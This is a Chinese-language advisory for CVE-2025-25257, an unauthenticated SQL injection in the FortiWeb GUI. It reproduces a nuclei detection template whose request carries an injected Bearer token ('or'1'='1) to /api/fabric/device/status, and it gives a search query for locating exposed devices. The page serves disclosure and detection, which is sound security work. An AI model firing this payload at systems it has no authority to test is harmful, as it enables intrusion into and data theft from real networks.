FortiWeb GUI 未授权SQL注入漏洞

漏洞信息

漏洞名称： FortiWeb GUI 未授权SQL注入漏洞

漏洞编号：

• CVE： CVE-2025-25257

漏洞类型： SQL注入

漏洞等级： 严重

漏洞描述： FortiWeb是Fortinet公司提供的一款Web应用防火墙（WAF），旨在保护Web应用程序免受各种网络攻击，如SQL注入、跨站脚本（XSS）等。它广泛应用于企业级环境中，用于保护关键的Web资产。该产品因其强大的防护能力和易用性而受到许多组织的青睐。

该漏洞存在于FortiWeb的图形用户界面（GUI）中，具体表现为未对用户输入进行适当的过滤和转义，导致攻击者可以通过构造特殊的HTTP或HTTPS请求，实现未授权的SQL命令执行。这种漏洞的技术根源在于应用程序未能正确中和SQL查询中的特殊元素，从而允许攻击者操纵后端数据库查询。

此漏洞的影响极为严重，因为它允许未经验证的攻击者远程执行SQL命令，可能导致数据泄露、数据篡改、服务中断等严重后果。由于攻击者无需任何形式的认证即可利用此漏洞，因此其风险等级被评定为“严重”。此外，该漏洞的利用过程可以自动化进行，进一步增加了其潜在危害。

产品厂商： Fortinet

产品名称： FortiWeb

搜索语法： ssl:”cn=fortiweb”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/c598855186c32bfcf9e88013a14cc227d54035d4/http%2Fcves%2F2025%2FCVE-2025-25257.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-25257

info:
  name: Unauthenticated SQL injection in FortiWeb GUI
  author: watchtowr,johnk3r
  severity: critical
  description: An improper neutralization of special elements used in an SQL command ('SQL Injection') vulnerability [CWE-89] in FortiWeb may allow an unauthenticated attacker to execute unauthorized SQL code or commands via crafted HTTP or HTTPs requests.
  reference:
    - https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
    - https://fortiguard.fortinet.com/psirt/FG-IR-25-151
  metadata:
    verified: true
    max-request: 1
    shodan-query: ssl:"cn=fortiweb"
  tags: cve,2025,fortinet,fortiweb

http:
  - raw:
      - |
        GET /api/fabric/device/status HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer AAAAAA'or'1'='1

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'serial'
          - 'fortiweb'
        condition: and

      - type: status
        status:
          - 200